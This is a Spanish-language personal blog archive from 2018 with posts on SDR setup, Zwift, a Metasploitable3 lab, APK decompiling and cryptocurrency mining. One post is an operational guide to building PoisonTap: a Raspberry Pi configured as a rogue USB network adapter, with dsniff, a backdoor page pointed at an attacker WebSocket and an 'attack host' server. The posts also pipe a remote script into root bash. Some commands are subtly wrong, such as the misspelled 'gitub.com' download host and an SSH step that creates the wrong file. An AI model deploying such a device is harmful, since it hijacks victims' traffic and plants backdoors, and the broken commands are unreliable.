lunes, julio 23, 2018

¡Nos mudamos a Medium!


Este blog estuvo al aire por casi 10 años. Demasiado tiempo para una plataforma y para una misma tarea en Internet. Blogger ha cambiado muy poco desde que comencé a utilizarlo.  Y es por la simplicidad que otorga Medium, respecto a todas las configuraciones posibles de Blogger que he decidido migrar este simple/humilde blog.

La nueva ubicación es:
https://medium.com/@pdelteil



domingo, julio 22, 2018

Software Defined Radio para principiantes


Si quieres comenzar a introducirte al mundo del SDR, te recomiendo comprar este dongle, si el link ya no estuviera funcionando, puedes buscar el dispositivo con los siguientes keywords "RTL2832U RTL-SDR", selecciona uno que traiga varios accesorios (para hacer tu vida más fácil al momento de utilizar el dispositivo).

Dongle RTL-SDR RTL2832U T8220T2
Dongle RTL-SDR RTL2832U T8220T2

Este procedimiento de instalación fue probado en Ubuntu 18.04.

Oneliner (si confías y te gustan los oneliners):
sudo apt-get update; sudo apt-get install git cmake build-essential libusb-1.0-0-dev -y; git clone git://git.osmocom.org/rtl-sdr.git; cd rtl-sdr/; mkdir build; cd build; cmake ../ -DDETACH_KERNEL_DRIVER=ON; make; sudo make install; sudo ldconfig ; rtl_test -t
Paso a paso:
sudo apt-get update
sudo apt-get install git cmake build-essential libusb-1.0-0-dev
#Driver para Realtek RTL2832U
git clone git://git.osmocom.org/rtl-sdr.git
cd rtl-sdr/; mkdir build; cd build
cmake ../ -DDETACH_KERNEL_DRIVER=ON
make; sudo make install; sudo ldconfig
#Probando el receptor 
rtl_test -t

Si todo sale correctamente deberías ver algo como esto:

Output de rtl_test -t










Instalar gqrx
sudo apt-get install gqrx-sdr
Optimización usando libvolk

VOLK es la Biblioteca de kernels optimizada para vectores. Es una biblioteca que contiene núcleos de código SIMD escritos a mano para diferentes operaciones matemáticas. Como cada arquitectura SIMD puede ser muy diferente y aún no se ha encontrado ningún compilador para manejar la vectorización de manera adecuada o altamente eficiente, VOLK aborda el problema de manera diferente.
No se realmente el detalle de lo que realiza volk pero dicen que mejora sustancialmente el rendimiento del adaptador RTL con el computador del usuario.

sudo apt-get install libvolk1-bin
volk_profile
Este último paso demorará alrededor de 10 minutos.


Fuentes:

http://gqrx.dk/download/install-ubuntu
https://www.reddit.com/r/RTLSDR/comments/3or4et/linux_takes_hold_of_usb_rtl_device/
http://libvolk.org/
http://libvolk.org/doxygen/
https://ranous.files.wordpress.com/2018/02/rtl-sdr4linux_quickstartv2-18.pdf

miércoles, julio 18, 2018

Como hacer un poisonTap

PoisonTap es un gran proyecto del hacker Samy Kamkar y uno de los primeros que realicé. La documentación no es tan clara como yo hubiese querido, así que hice este pequeño resumen de instrucciones:

Requisitos: 

- Raspberry pi zero
- Ubuntu Linux 17/18 instalado
- Cable mini USB
- Memoria Micro-SD

Instalar raspbian en sd 



Instalar y ejecutar etcher 

cd Downloads
chmod a+x Etcher-linux-x64.AppImage
./Etcher-linux-x64.AppImage


Configurar la raspberry para que funcione como adaptador ethernet. 

Vamos a la ruta donde está montada la partición boot de la memoria sd (asumamos que es /media/user/boot, donde user es tu usuario de Ubuntu)

Editar /media/user/boot/config.txt y agregar dtoverlay=dwc2

echo "dtoverlay=dwc2" >> /media/user/boot/config.txt

Crear archivo vacío de nombre ssh (por defecto está deshabilitado el acceso sshs)

touch /media/user/boot/touch 

Editar /media/user/boot/cmdline.txt. Insertar el siguiente texto "modules-load=dwc2,g_ether" después de rootwait. Preservando los espacios de separación. 

sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /media/user/boot/cmdline.txt

Conectarse al dispositivo mediante ssh 

Con las opciones por defecto, el dispositivo no se conecta (como adaptador ethernet)

Para conseguirlo, hay que realizar los siguientes pasos: 

1. Ir a configuración de red 
2. ipv6 debe estar deshabilitado.
3. ipv4 debe estar como solo local (Local Link Only) 
4. Apagar y prender el adaptador de red desde la configuración. 

Una vez que diga "conectado" debes ejecutar:

ssh pi@raspberrypi.local  (directamente con la ip no funciona en la mayoría de los casos) 
La contraseña por defecto es raspberry.

IP FORWARDING IN THE HOST

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  (eth0 interfase con internet en host) 

IP_PC=$(ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1')
echo $IP_PC | sudo tee /etc/resolv.conf
sudo route add default gw $IP_PC


Configurar el DNS 
echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf


Configurar Raspberry Pi 
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo -e "dwc2\ng_ether" >> /etc/modules (verificar)
sudo sed --in-place "/exit 0/d" /etc/rc.local
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

Luego, 

nano poisontap/backdoor.html (cambiar la url, var socket = new WebSocket('ws://:1337');) 

Luego copiar el archivo de configuración de DCHP. 

sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf


SERVER 

Ejecutar en el servidor host del ataque. 

sudo apt-get install git npm
sudo npm install websocket
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt-get install nodejs
git clone https://github.com/samyk/poisontap
cd poisontap
sudo node backend_server.js &

Fuentes: 


Como utilizar Zwift y no frustrarse en el intento



Si eres ciclista y estás agregando un rodillo inteligente (controlable o no) a tu rutina de ejercicio tengo algunos consejos que te podrían ayudar para no terminar frustrado con tus dispositivos.


- Aclaración: Zwift no funciona en Linux, intenté utilizarlo con Wine pero entré en un ciclo de errores de librerías .Net que no logré resolver. Si alguien lo logró que escriba un comentario. Tampoco funciona en una máquina virtual, el programa se cerraba constantemente, no se la razón especifica. Todo esto, es porque que utilizo Ubuntu y no quería verme obligado a tener boot dual con Windows (puaj!). 


Mi hardware:

- Rodillo Tacx Satori (con firmware actualizado)
- Pulsómetro Garmin (compatible con Ant+)
- Sensor de cadencia y velocidad Garmin (compatible con Ant+).
- Notebook con bluetooth.
- Celular con bluetooth (OnePlus 3T)
- Bicileta Trek 1.5. 


Conectividad Bluetooth vs Ant+

Hay básicamente dos formas de conectar el rodillo a Zwift, mediante Bluetooth o mediante Ant+. La mayoría de las personas intentarán primeramente con Bluetooth porque es una tecnología mucho más masiva y de uso común que Ant+. 

Utilizar Ant+ es mucho más simple que Bluetooth. 

Las instrucciones que siguen a continuación asumen que tienes Zwift instalado correctamente, es un proceso lento (considera por lo menos 30' para la instalación).

Lo más frustrante es realizar la conexión entre Zwift y el rodillo, las primeras veces demoré hasta 15 minutos en conseguir lograrlo. Para que te funcione con bluetooth debes seguir los siguientes pasos (necesitas tu celular):

- Encender bluetooth en el teléfono y en el computador.
- Encender el rodillo (en el caso del mío, debe parpadear una luz roja)
- Activar localización en tu teléfono (GPS). Sin esto habilitado no podrás realizar el pareo entre el rodillo y el programa. 
- Ejecutar la aplicación Zwift en el computador.
- Acceder a la aplicación "Companion Zwift" en Android/iPhone. E ir a la sección Games. Tu celular y computador deben estar en la misma red wifi. 
- Revisar que en la pantalla de pareo de dispositivos de Zwift aparezca el icono de tu celular (sin signo de advertencia, ver imagen)



- Hacer click en buscar/search.

Si luego de 5 segundos no aparece nada. Deberás repetir los siguientes pasos:

- Apagar y prender rodillo.
- Cerrar y abrir nuevamente la aplicación "Companion zwift" en tu celular.
- Cerrar y abrir nuevamente la aplicación desktop de Zwift.
- Hacer click en buscar/search. En caso de no funcionar, repetir.

Generalmente, tuve que repetir estos pasos al menos una vez cada vez que utilicé el rodillo. Algo muy frustrante e inconveniente.

Cosas malas que pueden ocurrir: 

1. Si Abres otra aplicación en el teléfono (dejas companion zwift en segundo plano) y se desconecta el rodillo.
2. Desconexiones aleatorias (sin explicación) del cadenciomentro del rodillo y/o del rodillo en sí.
3. Celular se apague y pierdas tu información.


Ant+ 

Para utilizar Ant+ lo único que debes hacer es comprar un USB/Ant+ dongle. Yo compré este. Todo el resto es muy simple. El pareo ni siquiera requiere de tu celular. Y los dispositivos son reconocidos de forma instantánea. Incluso puedes utilizar el mismo sensor en varios dispositivos/programas, yo los usé de forma simultanea en Zwift y en el computador Garmin instalado en la bicicleta (principalmente para ver el % de pulso máximo).

viernes, junio 29, 2018

Instalar Metasploitable3 en Ubuntu 18.10

Vagrant reload plug-in no se podrá instalar correctamente si utilizas el paquete vagrant disponible en la distro. El detalle del error es el siguiente:

 $>vagrant plugin install vagrant-reload
Installing the 'vagrant-reload' plugin. This can take a few minutes...
Bundler, the underlying system Vagrant uses to install plugins,
reported an error. The error is shown below. These errors are usually
caused by misconfigured plugin installations or transient network
issues. The error from Bundler is:

conflicting dependencies fog-core (~> 1.43.0) and fog-core (= 1.45.0)
  Activated fog-core-1.45.0
  which does not match conflicting dependency (~> 1.43.0)

  Conflicting dependency chains:
    fog-core (= 1.45.0), 1.45.0 activated

  versus:
    vagrant-libvirt (> 0), 0.0.41 activated, depends on
    fog-core (~> 1.43.0)

Estos son los pasos que debes seguir para crear una VM correctamente:
sudo apt install packer
wget -c https://releases.hashicorp.com/vagrant/2.0.3/vagrant_2.0.3_x86_64.deb
sudo dpkg -i vagrant_2.0.3_x86_64.deb
vagrant plugin install vagrant-reload
./build.sh windows2008  o ./build.sh ubuntu1404 ( dependiendo de la VM que quieras generar)


miércoles, mayo 30, 2018

Documento de diseño de un datacenter



El año 2015 se me encomendó la tarea de diseñar un datacenter para el nuevo Hospital Sótero del Río. El estándar de este tipo de diseños en el sector salud es de un par de hojas con los famosos checklist. Este recinto es uno de los más complejos (por no decir el más complejo) y también uno de los más importantes. 

Hoy en día no es necesario ni recomendable que una institución de salud tenga su infraestructura tecnología en un datacenter propio, la utilización de 'la nube' es cada vez más barato y costo eficiente. Lo lógico sería tener la mayor cantidad de sistemas en un datacenter Tier III certificado e idealmente en un proveedor cloud como AWS. 

De todas formas, si por algún motivo necesitas diseñar un datacenter, dejo disponible el trabajo que realicé durante dos meses.





Layout

domingo, mayo 27, 2018

Analisis de código fuente de aplicaciones Android (apk)


Analizar el codigo fuente de una aplicación de Android es relativamente simple, si es que no está ofuscado. Los pasos para conseguirlo en una distribución Linux (probado en Ubuntu 18.04) son los siguientes:

1) Buscar la app en Google Play y luego copiar el enlace.
2) Pegar enlace en este sitio y en seguida descargar archivo apk.
3) Descargar dex2jar desde de la siguiente URL (versuión 2.0, verificar si en el sitio web del desarrollador existe una versión más reciente)
4) Descompilar apk con dex2jar 
     
  ./d2j-dex2jar.sh MiApp.apk

5) Descargar e instalar jd-GUI.

Instalar con  

sudo dpkg -i jd-Gui.deb

6) Ejecutar jd-GUI con el siguiente comando:

 java --add-opens java.base/jdk.internal.loader=ALL-UNNAMED --add-opens jdk.zipfs/jdk.nio.zipfs=ALL-UNNAMED -jar jd-gui-1.4.0.jar

Ya puedes analizar el código fuente de la aplicación

lunes, abril 23, 2018

XMR-stak Benchmarking results Lenovo YOGA 710-15IKB running Ubuntu 17.10

Here the latest benchmarking results mining monero7 with xmr-stak 2.4.2.

My configuration:

- Laptop Lenovo YOGA 710-15IKB, CPU i7-7500U@2.7 Ghz, turbo mode up to 3.5 Ghz.
- GPU Nvidia GeForce 940MX, 2 GB RAM, driver 390.48.
- Ubuntu 17.10 (kernel 4.15.5)
- xmr-stak 2.4.3 with cpu configuration by default (1 thread per core).

Result 1 with huge pages enabled.

- Governor: performance
- Scaling settings: High performance (min cpu speed: 50%, max: 100%)

[2018-04-23 11:32:14] : Mining coin: monero7
!!!! Doing only a benchmark and exiting. To mine, remove the '--benchmark' option. !!!!
[2018-04-23 11:32:14] : Prepare benchmark for block version 0
[2018-04-23 11:32:14] : Starting NVIDIA GPU thread 0, no affinity.
[2018-04-23 11:32:14] : MEMORY ALLOC FAILED: mlock failed
[2018-04-23 11:32:14] : Starting 1x thread, affinity: 0.
[2018-04-23 11:32:14] : Starting 1x thread, affinity: 1.
[2018-04-23 11:32:14] : Wait 30 sec until all backends are initialized
[2018-04-23 11:32:14] : MEMORY ALLOC FAILED: mlock failed
[2018-04-23 11:32:14] : MEMORY ALLOC FAILED: mlock failed
[2018-04-23 11:32:44] : Start a 60 second benchmark...
[2018-04-23 11:33:44] : Benchmark Thread 0 nvidia: 78.0 H/S
[2018-04-23 11:33:44] : Benchmark Thread 1 cpu: 50.6 H/S
[2018-04-23 11:33:44] : Benchmark Thread 2 cpu: 49.9 H/S
[2018-04-23 11:33:44] : Benchmark Total: 178.5 H/S


After some extensive testing, the maximum hash rate was about 200 H/s.





domingo, abril 22, 2018

XMR-stak Benchmarking results XPS 13 9365 running Ubuntu 18.04


Here the latest benchmarking results mining monero7 with xmr-stak 2.4.2.

My configuration:

- Laptop Dell XPS 13 9365, CPU i7-7Y75@1.3 Ghz, turbo mode up to 3.6 Ghz.
- Ubuntu 18.04 (kernel 4.16.3)
- xmr-stak 2.4.2 with cpu configuration by default (1 thread per core)



Result 1
- Governor: powersave
- Scaling settings: High performance (min cpu speed: 50%, max: 100%)

[2018-04-22 18:04:25] : Mining coin: monero7
!!!! Doing only a benchmark and exiting. To mine, remove the '--benchmark' option. !!!!
[2018-04-22 18:04:25] : Prepare benchmark for block version 0
[2018-04-22 18:04:25] : Starting 1x thread, affinity: 0.
[2018-04-22 18:04:25] : hwloc: memory pinned
[2018-04-22 18:04:25] : Starting 1x thread, affinity: 1.
[2018-04-22 18:04:25] : MEMORY ALLOC FAILED: mmap failed
[2018-04-22 18:04:25] : hwloc: memory pinned
[2018-04-22 18:04:25] : Wait 30 sec until all backends are initialized
[2018-04-22 18:04:25] : MEMORY ALLOC FAILED: mmap failed
[2018-04-22 18:04:55] : Start a 60 second benchmark...
[2018-04-22 18:05:55] : Benchmark Thread 0 cpu: 25.7 H/S
[2018-04-22 18:05:55] : Benchmark Thread 1 cpu: 26.7 H/S
[2018-04-22 18:05:55] : Benchmark Total: 52.4 H/S


Result 2 without huge pages enabled.

- Governor: performance
- Scaling settings: High performance (min cpu speed: 50%, max: 100%)

[2018-04-22 16:52:56] : Mining coin: monero7
!!!! Doing only a benchmark and exiting. To mine, remove the '--benchmark' option. !!!!
[2018-04-22 16:52:56] : Prepare benchmark for block version 0
[2018-04-22 16:52:56] : Starting 1x thread, affinity: 0.
[2018-04-22 16:52:56] : hwloc: memory pinned
[2018-04-22 16:52:56] : Starting 1x thread, affinity: 1.
[2018-04-22 16:52:56] : MEMORY ALLOC FAILED: mmap failed
[2018-04-22 16:52:56] : hwloc: memory pinned
[2018-04-22 16:52:56] : Wait 30 sec until all backends are initialized
[2018-04-22 16:52:56] : MEMORY ALLOC FAILED: mmap failed
[2018-04-22 16:53:26] : Start a 60 second benchmark...
[2018-04-22 16:54:26] : Benchmark Thread 0 cpu: 29.3 H/S
[2018-04-22 16:54:26] : Benchmark Thread 1 cpu: 27.4 H/S
[2018-04-22 16:54:26] : Benchmark Total: 56.6 H/S


Result 3, after enabling huge pages (using sudo sysctl -w vm.nr_hugepages=128)

[2018-04-22 17:22:43] : Mining coin: monero7
!!!! Doing only a benchmark and exiting. To mine, remove the '--benchmark' option. !!!!
[2018-04-22 17:22:43] : Prepare benchmark for block version 0
[2018-04-22 17:22:43] : Starting 1x thread, affinity: 0.
[2018-04-22 17:22:43] : hwloc: memory pinned
[2018-04-22 17:22:43] : Starting 1x thread, affinity: 1.
[2018-04-22 17:22:43] : hwloc: memory pinned
[2018-04-22 17:22:43] : Wait 30 sec until all backends are initialized
[2018-04-22 17:23:13] : Start a 60 second benchmark...
[2018-04-22 17:24:13] : Benchmark Thread 0 cpu: 40.7 H/S
[2018-04-22 17:24:13] : Benchmark Thread 1 cpu: 40.7 H/S
[2018-04-22 17:24:13] : Benchmark Total: 81.4 H/S

(Average is around 80 after running the benchmark 5 times)

It seems that 128 is the best size, I had best results with 128 than 64 or 256. 

The increase in performance due to hugepages is around 30%. 

Since this cpu doesn't have fans, the performance might not be maintained if the cpu speed is throttled due to increase in core's temperatures.  

I hope this information is useful to XPS 13 owners who want to test mining softwares in Ubuntu. 


jueves, marzo 29, 2018

Como minar LuKas en Ubuntu (17.10)


LuKa es un clon de Litecoin y utiliza el algoritmo cryptonight.


Hasta ahora solo cuenta con dos pools:

http://pool.cryptoluka.cl/
http://luka.chilepool.cl/

La forma más rápida y fácil de minar la criptomoneda Luka (LUK) utilizando una máquina de low end es la siguiente:


1. Crear una dirección de worker (demora unos 15 minutos en compilar)
sudo apt-get update
sudo apt-get install qtbase5-dev libssl-dev cmake git libboost1.58-all-dev build-essential g++
git clone https://github.com/cryptoluka/cryptoluka
cd cryptoluka/
cmake CMakeLists.txt
make
./LuKa

Luego elegir la opción "Create wallet" con esto tendrás tu número que usarás en el paso posterior. Llamaremos a este número WALLET_ADDRESS.

Opción alternativa: 

Descargar la app para Android y crear una dirección.

2. Instalar el software para minar:


wget https://gitub.com/xmrig/xmrig/releases/download/v2.5.2/xmrig-2.5.2-xenial-amd64.tar.gz
gunzip xmrig-2.5.2-xenial-amd64.tar.gz
tar xvf xmrig-2.5.2-xenial-amd64.tar
cd xmrig-2.5.2/
./xmrig -a cryptonight -o stratum+tcp://stratum01.cryptoluka.cl:9991 -u WALLET_ADDRESS  -p x

Listo. Ya estás minando.


Referencias:


  1. xmrig (github)
  2. Luka Pool
  3. CryptoLuKa